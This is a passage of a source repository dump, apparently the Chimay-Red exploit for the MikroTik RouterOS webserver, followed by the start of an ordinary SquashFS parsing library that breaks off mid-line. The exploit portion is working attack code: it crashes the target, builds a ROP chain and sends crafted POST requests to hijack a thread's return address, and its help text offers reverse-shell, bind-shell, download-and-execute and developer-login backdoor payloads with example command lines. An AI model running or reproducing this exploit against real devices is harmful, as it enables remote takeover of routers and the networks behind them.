custom_shellcode currently not implemented in this version. Coming in June") 241 | 242 | @staticmethod 243 | def custom_shell_command(vector, *args): 244 | return throw_v6(vector, args[2]) 245 | 246 | @staticmethod 247 | def do_crash(): 248 | """ 249 | :return: 250 | """ 251 | is_crashed = False 252 | connections = [create_socket(TARGET.rhost, TARGET.rport)] * 2 253 | 254 | connections[0].send(craft_post_header(length=(-0x1))) 255 | connections[0].send(b"A" * 1000) 256 | connections[0].close() 257 | 258 | try: 259 | connections[1].send("A" * 10) 260 | except EOFError: 261 | is_crashed = True 262 | 263 | return is_crashed 264 | 265 | 266 | def throw_v6(vector, command): 267 | threads = 2 268 | connections = list() 269 | ropper = MikroROP(context.binary, command=command) 270 | 271 | if not connectable(TARGET.rhost): 272 | log.error("Cannot communicate with target, you sure it's up?") 273 | 274 | TARGET.version = get_remote_version() 275 | 276 | if not exploitable(TARGET.version): 277 | log.error("{} is not exploitable!".format(TARGET.rhost)) 278 | 279 | if not TARGET.architecture: 280 | try: 281 | # attempt to remotely retreive the target architecture if available target location available in route table 282 | for route in get_system_routes(): 283 | if check_cidr_overlap(route, "{}.0/24".format(".".join(TARGET.rhost.split(".")[:-1]))): 284 | log.success("Found target in route table range: {}/24".format(route)) 285 | TARGET.architecture = get_remote_architecture(TARGET.rhost) 286 | break 287 | except GeneratorExit: 288 | TARGET.architecture = "x86" 289 | log.warning("Cannot determine remote target architecture, no route table match") 290 | log.warning("\tTarget Architecture: [{}] (Fallback)".format(TARGET.architecture)) 291 | except (StopIteration, KeyboardInterrupt): 292 | TARGET.architecture = "x86" 293 | log.warning("Skipped architecture detection as requested") 294 | log.warning("\tTarget Architecture: [{}] (Fallback)".format(TARGET.architecture)) 295 | 296 | log.info("Beginning chimay-red [throw_v6] with specs:" 297 | "\nTarget: '{target: >5}'" 298 | "\nCommand: '{command: >5}'" 299 | "\nVector: '{vector: >5}'" 300 | "\nVersion: '{version: >5}'" 301 | "\nArchitecture: '{architecture}'" 302 | "".format( 303 | target=TARGET.rhost, 304 | command=command, 305 | vector=vector, 306 | version=TARGET.version, 307 | architecture=TARGET.architecture)) 308 | 309 | try: 310 | if vector == "mikrodb": 311 | arch_offsets = offsets = None 312 | # instantiate MikroDB offset lookup helper 313 | lookuper = mikrodb.MikroDb("lite://mikro.db") 314 | if not TARGET.version: 315 | log.error("Could not determinte remote version, cannot proceed for current vector.") 316 | # fetch offsets from database given architecture and version 317 | if not lookuper.get("www"): 318 | log.error("Could not locate www table in database, please build database.") 319 | else: 320 | arch_offsets = lookuper["www"].get(TARGET.architecture) 321 | if not arch_offsets: 322 | log.error("Could not locate architecture: [{}] in database, please rebuild the database.".format( 323 | TARGET.architecture)) 324 | if not arch_offsets.get(TARGET.version): 325 | log.error("Could not locate version: [{}] in database, please rebuild the database.".format( 326 | TARGET.version)) 327 | if not arch_offsets[TARGET.version].get("offsets"): 328 | log.error("Could not locate offsets for architecture: [{}] and version: [{}] in database, please" 329 | " rebuild the database.".format(TARGET.architecture, TARGET.version)) 330 | else: 331 | offsets = arch_offsets[TARGET.version]["offsets"] 332 | offsets = namedtuple("offsets", sorted(offsets))(**offsets) # Quick lil conversion 333 | 334 | ropper.build_ropchain(offsets=offsets) 335 | elif vector == "leak": 336 | log.info("Attempting to leak pointers from remote process map...") 337 | # instantiate memory leaker helper object class 338 | leaker = MikroLeaker(context) 339 | leaker.leak() 340 | leaker.analyze_leaks() 341 | elif vector == "build" or "default": 342 | ropper.build_ropchain() 343 | else: 344 | log.error("developer error occured selecting the proper vector!") 345 | 346 | log.info("Crashing target initially for reliability sake...") 347 | while not Command(command="do_crash"): 348 | continue 349 | with log.progress("Successfully crashed! Target webserver will be back up in") as progress: 350 | for tick in reversed(range(1, 4)): 351 | progress.status("{0} seconds...".format(tick)) 352 | time.sleep(1) 353 | progress.success("UP") 354 | 355 | log.info("Allocating {0} threads for main payload...".format(threads)) 356 | [connections.append(create_socket(TARGET.rhost, TARGET.rport)) for _ in range(threads)] 357 | 358 | log.info("POST content_length header on thread0 to overwrite thread1_stacksize + skip_size + payload_size") 359 | connections[0].send(craft_post_header(length=0x20000 + 0x1000 + len(ropper.chain) + 1)) 360 | time.sleep(0.5) 361 | 362 | log.info("Incrementing POST read() data buffer pointer on thread0 to overwrite return address on thread1") 363 | connections[0].send(b'\x90' * (((0x1000 - 0x10) & 0xFFFFFF0) - (context.bits >> 3))) 364 | time.sleep(0.5) 365 | 366 | log.info("POST content_length header on thread1 to allocate maximum space for payload: ({}) bytes".format( 367 | len(ropper.chain) + 1)) 368 | connections[1].send(craft_post_header(length=len(ropper.chain) + 1)) 369 | time.sleep(0.5) 370 | 371 | log.info("Sending ROP payload...") 372 | connections[0].send(ropper.chain) 373 | time.sleep(0.5) 374 | 375 | log.info("Closing connections sequentially to trigger execution...") 376 | [connection.close() for connection in connections] 377 | except KeyboardInterrupt: 378 | raise SystemExit(log.warning("SIGINT received, exiting gracefully...")) 379 | except Exception: 380 | raise 381 | 382 | return True 383 | 384 | 385 | def profile_main(): 386 | """ 387 | 388 | :return: 389 | """ 390 | log.info("Profiling: ENABLED") 391 | # Enable memory usage profiling at the line level 392 | tracemalloc.start() 393 | # Enable CPU usage/function call timing/rate at the function level 394 | # Automatigically dumps profile to `filename` for further analysis 395 | cProfile.run("main()", filename=(CWD + "/chimay-red.cprof")) 396 | # Take snapshot of traced malloc profile 397 | snapshot = tracemalloc.take_snapshot() 398 | # Print snapshot statistics filtering for only `tracefiles` 399 | display_top(snapshot, limit=20, modpaths=TRACEFILES) 400 | 401 | return 0 402 | 403 | 404 | def main(): 405 | """ DocstringNotImplemented """ 406 | 407 | # set pwntools context for binary file 408 | if TARGET.binary: 409 | context.binary = TARGET.binary 410 | if TARGET.debug: 411 | # Setup pwnlib context for tmux debug automation 412 | context.terminal = ['tmux', '-L', 'chimay-red', 'splitw', '-v', '-p', '50'] 413 | # run remote gdbserver attached to `www` PID on TARGET 414 | run_new_remote_gdbserver(TARGET.rhost, TARGET.gdbport) 415 | # attach and connect to remote gdbserver on TARGET 416 | attach_gdb_server(TARGET.rhost, TARGET.gdbport, TARGET.binary, TARGET.breakpoints.split(",")) 417 | 418 | if TARGET.shellcommand: 419 | Command(TARGET.vector, TARGET.rhost, TARGET.lhost, TARGET.shellcommand, command="custom_shell_command") 420 | else: 421 | Command(TARGET.vector, TARGET.rhost, TARGET.lhost, command=TARGET.command) 422 | 423 | 424 | # Run the script 425 | if __name__ == '__main__': 426 | PARSER = argparse.ArgumentParser( 427 | formatter_class=argparse.RawDescriptionHelpFormatter, 428 | epilog=u""" 429 | Commands: 430 | COMMAND FUNCTION 431 | 432 | bindshell create a bindshell 433 | connectback create a reverse shell 434 | download_and_exe connect back and download a file to then execute 435 | ssl_download_and_exe connect back and download a file via SSL to then execute 436 | write_devel write "devel-login" file to allow developer account login 437 | write_devel_read_userfile in addition to enabling developer logins, read back the users file 438 | 439 | custom_shellcode run arbitrary shellcode from `--shellcode` binfile 440 | custom_shell_command run a arbitrary $sh one liner on the target 441 | 442 | Vectors: 443 | default: (mikrodb) 444 | 445 | [Generic] 446 | mikrodb: 447 | use the accompanying mikrodb database to load offsets 448 | based off of detected remote version to build a ROP chain. 449 | 450 | build: 451 | build a ROP chain from scratch given the www binary matching 452 | the remote version running. 453 | 454 | [Experimental] 455 | leak: 456 | leak pointers from shared libraries to give better odds of 457 | finding base offset of uclibc. 458 | 459 | Examples: 460 | 461 | Running simple shell command: 462 | ./chimay_red.py -v -t 192.168.56.124:80 \\ 463 | --vector=mikrodb \\ 464 | --lhost=192.168.56.1 \\ 465 | --shellcommand="ls -la" custom_shell_command 466 | 467 | Getting a reverse shell: 468 | ./chimay_red.py -v -t 192.168.56.124:80 \\ 469 | --vector=mikrodb \\ 470 | --lhost=192.168.56.1 connectback 471 | 472 | Debugging the target: 473 | ./chimay_red.py -v -t 192.168.56.124:80 \\ 474 | --vector=build \\ 475 | --architecture="x86" \\ 476 | --binary=$PWD/storage/www/www-x86-6.38.4.bin \\ 477 | --debug \\ 478 | --gdbport=4444 \\ 479 | --lhost=192.168.56.1 connectback 480 | 481 | 482 | ================================================== 483 | | _______ _ ___ __| 484 | | / ___/ / (_)_ _ ___ ___ ______/ _ \___ ___/ /| 485 | |/ /__/ _ \/ / ' \/ _ `/ // /___/ , _/ -_) _ / | 486 | |\___/_//_/_/_/_/_/\_,_/\_, / /_/|_|\__/\_,_/ | 487 | | /___/ | 488 | ================================================== 489 | """) 490 | 491 | PARSER.add_argument("command", 492 | action="store", 493 | default="connectback", 494 | help="command function to run on target, see below for options") 495 | 496 | PARSER.add_argument("-t", "--target", 497 | action="store", 498 | default=None, 499 | required=True, 500 | help="target address:port") 501 | 502 | PARSER.add_argument("-l", "--lhost", 503 | action="store", 504 | default=None, 505 | required=False, 506 | help="specify the connectback* address") 507 | 508 | PARSER.add_argument("--shellcommand", 509 | action="store", 510 | default=False, 511 | help="return interactive shell as main payload (default)") 512 | 513 | PARSER.add_argument("-d", "--debug", 514 | action="store_true", 515 | default=False, 516 | help="enable debugging mode") 517 | 518 | PARSER.add_argument("--breakpoints", 519 | action="store", 520 | default=None, 521 | help="list of comma delimited breakpoint addresses. Eg. 0x800400,0x800404") 522 | 523 | PARSER.add_argument("-a", "--architecture", 524 | action="store", 525 | default="", 526 | help="target architecture (will detect automatically if target in route table range)") 527 | 528 | PARSER.add_argument("--gdbport", 529 | action="store", 530 | default="4444", 531 | help="port to use when connecting to remote gdbserver") 532 | 533 | PARSER.add_argument("--binary", 534 | action="store", 535 | help="target binary (www)") 536 | 537 | PARSER.add_argument("--shellcode", 538 | action="store", 539 | help="custom (optional) shellcode payload binary filepath") 540 | 541 | PARSER.add_argument("--vector", action="store", 542 | default="build", 543 | help="optional vector type, see below for options") 544 | 545 | PARSER.add_argument("--leakrounds", 546 | action="store", 547 | help="amount of rounds to leak pointers, higher is better, but takes more time") 548 | 549 | PARSER.add_argument("-v", "--verbose", 550 | action="store_true", 551 | default=0, 552 | help="Verbosity mode") 553 | 554 | PARSER.add_argument("--version", action="version", 555 | version="%(prog)s (version {version})".format(version=__version__)) 556 | 557 | ARGS = PARSER.parse_args() 558 | 559 | try: 560 | # TARGET COMAND FILTERING 561 | if ARGS.command not in Command.__commands__: 562 | raise RuntimeError("command: {0} is not available".format(ARGS.command)) 563 | elif "connectback" in ARGS.command: 564 | if not ARGS.lhost: 565 | raise RuntimeError("command: {0} requires additional argument --lhost".format(ARGS.command)) 566 | 567 | # TARGET ADDR FILTERING 568 | if ':' in ARGS.target: 569 | try: 570 | socket.inet_aton(ARGS.target.split(":")[0]) 571 | except socket.error: 572 | raise RuntimeError("ip address is improperly formatted") 573 | else: 574 | TARGET.rhost, TARGET.rport = ARGS.target.split(":") 575 | else: 576 | raise RuntimeError("improperly formatted address:port specification") 577 | 578 | # DEBUG ARG CHECKING 579 | if ARGS.debug: 580 | if not ARGS.gdbport: 581 | raise RuntimeError("debug mode specified without --gdbport") 582 | elif not ARGS.gdbport.isdigit(): 583 | raise RuntimeError("gdbport is improperly formatted") 584 | elif not ARGS.binary: 585 | raise RuntimeError("debug mode specified without --binary filepath") 586 | elif not os.path.isfile(ARGS.binary): 587 | raise RuntimeError("supplied binary could not be found!\n") 588 | elif ARGS.breakpoints: 589 | for bp in ARGS.breakpoints.split(","): 590 | if not bp.startswith("0x"): 591 | raise RuntimeError("improperly formatted breakpoint in --breakpoints") 592 | 593 | # VECTOR ARG CHECKING 594 | if ARGS.vector not in VECTORS: 595 | raise RuntimeError("vector: {} is not available".format(ARGS.vector)) 596 | if ARGS.vector.startswith("build"): 597 | if not ARGS.binary: 598 | raise RuntimeError("build vector specified without --binary filepath") 599 | if not os.path.isfile(ARGS.binary): 600 | raise RuntimeError("supplied binary could not be found!\n") 601 | 602 | # ARCHITECTURE ARG CHECKING 603 | if not ARGS.architecture: 604 | log.warning("No architecture specified, defaulting to ({})".format(SUPPORTED_ARCHS[0])) 605 | elif ARGS.architecture not in SUPPORTED_ARCHS: 606 | log.error("Unsupported architecture specified") 607 | 608 | # TARGET NAMESPACE SETTING, YEA I USED A GLOBAL NAMESPACE, SUE ME 609 | for argname, value in vars(ARGS).items(): 610 | setattr(TARGET, argname, value) 611 | except RuntimeError as exc: 612 | raise PrintHelpException(exc) 613 | 614 | # PROFILING DETECTION 615 | if PROFILING: 616 | raise SystemExit(profile_main()) 617 | else: 618 | raise SystemExit(main()) 619 | else: # Chimay-Red is not a library! 620 | raise ImportError 621 | -------------------------------------------------------------------------------- /lib/thirdparty/PySquashfsImage/PySquashfsImage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # -*- coding: utf-8 -*- 4 | 5 | """ 6 | This module is released with the LGPL license. 7 | Copyright 2011-2012 8 | 9 | Matteo Mattei 10 | Nicola Ponzeveroni 11 | 12 | It is intended to be used to access files into a SQUASHFS 4.0 image file. 13 | 14 | Based on Phillip Lougher Unsquash tool 15 | """ 16 | __all__ = ['SquashFsImage','SquashedFile','SquashInode'] 17 | 18 | import sys 19 | import stat 20 | 21 | SQUASHFS_CHECK = 2 22 | 23 | SQUASHFS_UIDS = 256 24 | SQUASHFS_GUIDS = 255 25 | 26 | ZLIB_COMPRESSION = 1 27 | LZMA_COMPRESSION = 2 28 | LZO_COMPRESSION = 3 29 | XZ_COMPRESSION = 4 30 | LZ4_COMPRESSION = 5 31 | 32 | SQUASHFS_MAJOR = 4 33 | SQUASHFS_MINOR = 0 34 | SQUASHFS_MAGIC = 0x73717368 35 | SQUASHFS_START = 0 36 | 37 | SQUASHFS_METADATA_SIZE = 8192 38 | SQUASHFS_METADATA_LOG = 13 39 | 40 | FRAGMENT_BUFFER_DEFAULT = 256 41 | DATA_BUFFER_DEFAULT = 256 42 | 43 | SQUASHFS_NAME_LEN = 256 44 | SQUASHFS_INVALID = 0xffffffffffff 45 | SQUASHFS_INVALID_FRAG = 0xffffffff 46 | SQUASHFS_INVALID_XATTR = 0xffffffff 47 | SQUASHFS_INVALID_BLK = 0xFFFFFFFFFFFFFFFF #-1 48 | SQUASHFS_USED_BLK = SQUASHFS_INVALID_BLK-1 #-2 49 | 50 | SQUASHFS_DIR_TYPE = 1 51 | SQUASHFS_FILE_TYPE = 2 52 | SQUASHFS_SYMLINK_TYPE = 3 53 | SQUASHFS_BLKDEV_TYPE = 4 54 | SQUASHFS_CHRDEV_TYPE = 5 55 | SQUASHFS_FIFO_TYPE = 6 56 | SQUASHFS_SOCKET_TYPE = 7 57 | SQUASHFS_LDIR_TYPE = 8 58 | SQUASHFS_LREG_TYPE = 9 59 | SQUASHFS_LSYMLINK_TYPE = 10 60 | SQUASHFS_LBLKDEV_TYPE = 11 61 | SQUASHFS_LCHRDEV_TYPE = 12 62 | SQUASHFS_LFIFO_TYPE = 13 63 | SQUASHFS_LSOCKET_TYPE = 14 64 | 65 | 66 | #****** MACROS 67 | SQUASHFS_COMPRESSED_BIT = (1 << 15) 68 | SQUASHFS_COMPRESSED_BIT_BLOCK = (1 << 24) 69 | 70 | def SQUASHFS_COMPRESSED_SIZE(B): 71 | if ((B) & ~SQUASHFS_COMPRESSED_BIT): 72 | return (B) & ~SQUASHFS_COMPRESSED_BIT 73 | else: 74 | return SQUASHFS_COMPRESSED_BIT 75 | 76 | def SQUASHFS_BIT(flag, bit): return (((flag >> bit) & 1)!=0) 77 | def SQUASHFS_CHECK_DATA(flags): return SQUASHFS_BIT(flags, SQUASHFS_CHECK) 78 | def SQUASHFS_COMPRESSED(B): return (((B) & SQUASHFS_COMPRESSED_BIT) == 0) 79 | def SQUASHFS_COMPRESSED_SIZE_BLOCK(B): return ((B) & ~SQUASHFS_COMPRESSED_BIT_BLOCK) 80 | def SQUASHFS_COMPRESSED_BLOCK(B): return (((B) & SQUASHFS_COMPRESSED_BIT_BLOCK) == 0) 81 | def SQUASHFS_INODE_BLK(a): return (((a) >> 16)&0xFFFFFFFF) 82 | def SQUASHFS_INODE_OFFSET(a): return (((a) & 0xffff)) 83 | def SQUASHFS_MKINODE(A, B): return ((((A) << 16) + (B))&0xFFFFFFFFFFFFFFFF) 84 | def SQUASHFS_MK_VFS_INODE(a, b): return ((((a) << 8) + ((b) >> 2) + 1)&0xFFFFFFFF) 85 | def SQUASHFS_MODE(a): return ((a) & 0xfff) 86 | def SQUASHFS_FRAGMENT_BYTES(A): return ((A) * 16) 87 | def SQUASHFS_FRAGMENT_INDEX(A): return (SQUASHFS_FRAGMENT_BYTES(A) // SQUASHFS_METADATA_SIZE) 88 | def SQUASHFS_FRAGMENT_INDEX_OFFSET(A): return (SQUASHFS_FRAGMENT_BYTES(A) % SQUASHFS_METADATA_SIZE) 89 | def SQUASHFS_FRAGMENT_INDEXES(A): return ((SQUASHFS_FRAGMENT_BYTES(A) + SQUASHFS_METADATA_SIZE - 1) // SQUASHFS_METADATA_SIZE) 90 | def SQUASHFS_FRAGMENT_INDEX_BYTES(A): return (SQUASHFS_FRAGMENT_INDEXES(A) * 8) 91 | def SQUASHFS_LOOKUP_BYTES(A): return ((A) * 8) 92 | def SQUASHFS_LOOKUP_BLOCK(A): return (SQUASHFS_LOOKUP_BYTES(A) // SQUASHFS_METADATA_SIZE) 93 | def SQUASHFS_LOOKUP_BLOCK_OFFSET(A): return (SQUASHFS_LOOKUP_BYTES(A) % SQUASHFS_METADATA_SIZE) 94 | def SQUASHFS_LOOKUP_BLOCKS(A): return ((SQUASHFS_LOOKUP_BYTES(A) + SQUASHFS_METADATA_SIZE - 1) // SQUASHFS_METADATA_SIZE) 95 | def SQUASHFS_LOOKUP_BLOCK_BYTES(A): return (SQUASHFS_LOOKUP_BLOCKS(A) * 8) 96 | def SQUASHFS_ID_BYTES(A): return ((A) * 4) 97 | def SQUASHFS_ID_BLOCK(A): return (SQUASHFS_ID_BYTES(A) // SQUASHFS_METADATA_SIZE) 98 | def SQUASHFS_ID_BLOCK_OFFSET(A): return (SQUASHFS_ID_BYTES(A) % SQUASHFS_METADATA_SIZE) 99 | def SQUASHFS_ID_BLOCKS(A): return ((SQUASHFS_ID_BYTES(A) + SQUASHFS_METADATA_SIZE - 1) // SQUASHFS_METADATA_SIZE) 100 | def SQUASHFS_ID_BLOCK_BYTES(A): return (SQUASHFS_ID_BLOCKS(A) * 8) 101 | def SQUASHFS_XATTR_BYTES(A): return ((A) * 16) 102 | def SQUASHFS_XATTR_BLOCK(A): return (SQUASHFS_XATTR_BYTES(A) // SQUASHFS_METADATA_SIZE) 103 | def SQUASHFS_XATTR_BLOCK_OFFSET(A): return (SQUASHFS_XATTR_BYTES(A) % SQUASHFS_METADATA_SIZE) 104 | def SQUASHFS_XATTR_BLOCKS(A):return ((SQUASHFS_XATTR_BYTES(A) + SQUASHFS_METADATA_SIZE - 1) // SQUASHFS_METADATA_SIZE) 105 | def SQUASHFS_XATTR_BLOCK_BYTES(A): return (SQUASHFS_XATTR_BLOCKS(A) * 8) 106 | def SQUASHFS_XATTR_BLK(A): return ( ((A) >> 16)&0xFFFFFFFF) 107 | def SQUASHFS_XATTR_OFFSET(A): return (((A) & 0xffff)) 108 | 109 | 110 | SQASHFS_LOOKUP_TYPE= [ 111 | 0, 112 | stat.S_IFDIR, 113 | stat.S_IFREG, 114 | stat.S_IFLNK, 115 | stat.S_IFBLK, 116 | stat.S_IFCHR, 117 | stat.S_IFIFO, 118 | stat.S_IFSOCK, 119 | stat.S_IFDIR, 120 | stat.S_IFREG, 121 | stat.S_IFLNK, 122 | stat.S_IFBLK, 123 | stat.S_IFCHR, 124 | stat.S_IFIFO, 125 | stat.S_IFSOCK] 126 | 127 | 128 | def str2byt(data): 129 | if type( data ) == str: 130 | return data.encode("latin-1") 131 | return data 132 | 133 | def byt2str(data): 134 | if type( data ) == bytes: 135 | return data.decode("latin-1") 136 | return data 137 | 138 | class _Compressor: 139 | def __init__(self): 140 | self.supported = 0 141 | self.name="none" 142 | 143 | def uncompress(self, src): 144 | return src 145 | 146 | class _ZlibCompressor: 147 | def __init__(self): 148 | self.supported = ZLIB_COMPRESSION 149 | self.name="zlib" 150 | 151 | def uncompress(self, src): 152 | import zlib 153 | return zlib.decompress(src) 154 | 155 | class _XZCompressor: 156 | def __init__(self): 157 | self.supported = XZ_COMPRESSION 158 | self.name="xz" 159 | 160 | def uncompress(self, src): 161 | try: 162 | import lzma 163 | except ImportError: 164 | from backports import lzma 165 | return lzma.decompress(src) 166 | 167 | _compressors = ( _Compressor(), _ZlibCompressor(), _XZCompressor() ) 168 | 169 | if sys.version_info[0] < 3: pyVersionTwo = True 170 | else: pyVersionTwo = False 171 | 172 | class _Squashfs_commons(): 173 | def makeInteger(self,myfile,length): 174 | """ Assemble multibyte integer """ 175 | ret = 0 176 | pwr = 1 177 | for i in range(0,length): 178 | ret += ((ord(myfile.read(1))&0xFF)*pwr) 179 | pwr *= 0x100 180 | return ret 181 | 182 | def readShort(self,myfile): 183 | return self.makeInteger(myfile,2) 184 | 185 | def readInt(self,myfile): 186 | return self.makeInteger(myfile,4) 187 | 188 | def readLong(self,myfile): 189 | return self.makeInteger(myfile,8) 190 | 191 | def makeBufInteger(self,buf,start,lenght): 192 | """ Assemble multibyte integer """ 193 | ret = 0 194 | pwr = 1 195 | for i in range(start,start+lenght): 196 | if pyVersionTwo: 197 | ret += ((ord(buf[i])&0xFF)*pwr) 198 | else: 199 | ret += ((int(buf[i])&0xFF)*pwr) 200 | pwr *= 0x100 201 | return ret 202 | 203 | def autoMakeBufInteger(self,buf,start,length): 204 | """ Assemble multibyte integer """ 205 | return (self.makeBufInteger(buf,start,length), start+length) 206 | 207 | class _Squashfs_super_block(_Squashfs_commons): 208 | def __init__(self): 209 | self.s_magic = 0 210 | self.inodes = 0 211 | self.mkfs_time = 0 212 | self.block_size = 0 213 | self.fragments = 0 214 | self.compression = 0 215 | self.block_log = 0 216 | self.flags = 0 217 | self.no_ids = 0 218 | self.s_major = 0 219 | self.s_minor = 0 220 | self.root_inode = 0 221 | self.bytes_used = 0 222 | self.id_table_start = 0 223 | self.xattr_id_table_start = 0 224 | self.inode_table_start = 0 225 | self.directory_table_start = 0 226 | self.fragment_table_start = 0 227 | self.lookup_table_start = 0 228 | 229 | def read(self,myfile): 230 | self.s_magic = self.readInt(myfile) 231 | self.inodes = self.readInt(myfile) 232 | self.mkfs_time = self.readInt(myfile) 233 | self.block_size = self.readInt(myfile) 234 | self.fragments = self.readInt(myfile) 235 | self.compression = self.readShort(myfile) 236 | self.block_log = self.readShort(myfile) 237 | self.flags = self.readShort(myfile) 238 | self.no_ids = self.readShort(myfile) 239 | self.s_major = self.readShort(myfile) 240 | self.s_minor = self.readShort(myfile) 241 | self.root_inode = self.readLong(myfile) 242 | self.bytes_used = self.readLong(myfile) 243 | self.id_table_start = self.readLong(myfile) 244 | self.xattr_id_table_start = self.readLong(myfile) 245 | self.inode_table_start = self.readLong(myfile) 246 | self.directory_table_start = self.readLong(myfile) 247 | self.fragment_table_start = self.readLong(myfile) 248 | self.lookup_table_start = self.readLong(myfile) 249 | 250 | class _Squashfs_fragment_entry(_Squashfs_commons): 251 | def __init__(self): 252 | self.start_block=0 253 | self.size=0 254 | self.unused=0 255 | self.fragment = None 256 | def read(self,myfile): 257 | self.start_block=self.readLong(myfile) 258 | self.size=self.readInt(myfile) 259 | self.unused=self.readInt(myfile) 260 | def fill(self,block,ofs): 261 | self.start_block,ofs=self.autoMakeBufInteger(block,ofs,8) 262 | self.size ,ofs=self.autoMakeBufInteger(block,ofs,4) 263 | self.unused ,ofs=self.autoMakeBufInteger(block,ofs,4) 264 | return ofs 265 | 266 | class SquashInode: 267 | def __init__(self,owner_image): 268 | self.image = owner_image 269 | self.blocks = 0 270 | self.block_ptr = 0 271 | self.data = 0 272 | self.fragment = 0 273 | self.frag_bytes = 0 274 | self.gid=0 275 | self.inode_number = 0 276 | self.mode = 0 277 | self.offset = 0 278 | self.start = 0 279 | self.symlink = 0 280 | self.time = 0 281 | self.type = 0 282 | self.uid = 0 283 | self.sparse = 0 284 | self.xattr = 0 285 | 286 | def getContent(self): 287 | return self.image.getFileContent(self) 288 | 289 | def hasAttribute(self,mask): 290 | return (self.mode & mask)==mask 291 | 292 | class _Inode_header(_Squashfs_commons): 293 | def __init__(self): 294 | self.inode_type =0 295 | self.mode=0 296 | self.uid=0 297 | self.guid=0 298 | self.mtime=0 299 | self.inode_number=0 300 | 301 | self.rdev=0 302 | self.xattr=0 303 | 304 | self.nlink=0 305 | self.symlink_size=0 306 | self.symlink=[] 307 | 308 | self.start_block=0 309 | self.fragment=0 310 | 311 | self.block_list=[] 312 | self.file_size=0 313 | self.offset=0 314 | self.parent_inode=0 315 | self.start_block=0 316 | self.file_size=0 317 | self.i_count=0 318 | self.offset=0 319 | 320 | self.file_size=0 321 | self.sparse=0 322 | self.index= [] 323 | 324 | def base_header(self,buff,offset): 325 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 326 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 327 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 328 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 329 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 330 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 331 | return offset 332 | 333 | def ipc_header(self,buff,offset): 334 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 335 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 336 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 337 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 338 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 339 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 340 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,4) 341 | return offset 342 | 343 | def lipc_header(self,buff,offset): 344 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 345 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 346 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 347 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 348 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 349 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 350 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,4) 351 | self.xattr,offset = self.autoMakeBufInteger(buff,offset,4) 352 | return offset 353 | 354 | def dev_header(self,buff,offset): 355 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 356 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 357 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 358 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 359 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 360 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 361 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,4) 362 | self.rdev,offset = self.autoMakeBufInteger(buff,offset,4) 363 | return offset 364 | 365 | def ldev_header(self,buff,offset): 366 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 367 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 368 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 369 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 370 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,2) 371 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,2) 372 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,2) 373 | self.rdev,offset = self.autoMakeBufInteger(buff,offset,2) 374 | self.xattr,offset = self.autoMakeBufInteger(buff,offset,2) 375 | return offset 376 | 377 | def symlink_header(self,buff,offset): 378 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 379 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 380 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 381 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 382 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 383 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 384 | self.nlink,offset = self.autoMakeBufInteger(buff,offset,4) 385 | self.symlink_size,offset = self.autoMakeBufInteger(buff,offset,4) 386 | self.symlink=buff[offset:] 387 | return offset 388 | 389 | def reg_header (self,buff,offset): 390 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 391 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 392 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 393 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 394 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 395 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 396 | self.start_block,offset = self.autoMakeBufInteger(buff,offset,4) 397 | self.fragment,offset = self.autoMakeBufInteger(buff,offset,4) 398 | self.offset,offset = self.autoMakeBufInteger(buff,offset,4) 399 | self.file_size,offset = self.autoMakeBufInteger(buff,offset,4) 400 | self.block_list=buff[offset:] 401 | return offset 402 | 403 | def lreg_header (self,buff,offset): 404 | self.inode_type,offset = self.autoMakeBufInteger(buff,offset,2) 405 | self.mode,offset = self.autoMakeBufInteger(buff,offset,2) 406 | self.uid,offset = self.autoMakeBufInteger(buff,offset,2) 407 | self.guid,offset = self.autoMakeBufInteger(buff,offset,2) 408 | self.mtime,offset = self.autoMakeBufInteger(buff,offset,4) 409 | self.inode_number,offset = self.autoMakeBufInteger(buff,offset,4) 410 | self.start_block,offset = self.autoMakeBufInteger(buff,offset,8) 411 | self.file_size,offset = self.autoMakeBufInteger(buff,offset,8) 412 | self.sparse,offset = self.autoMakeBufInteger(buff,offset,8) 413 | self.nlink,offset = 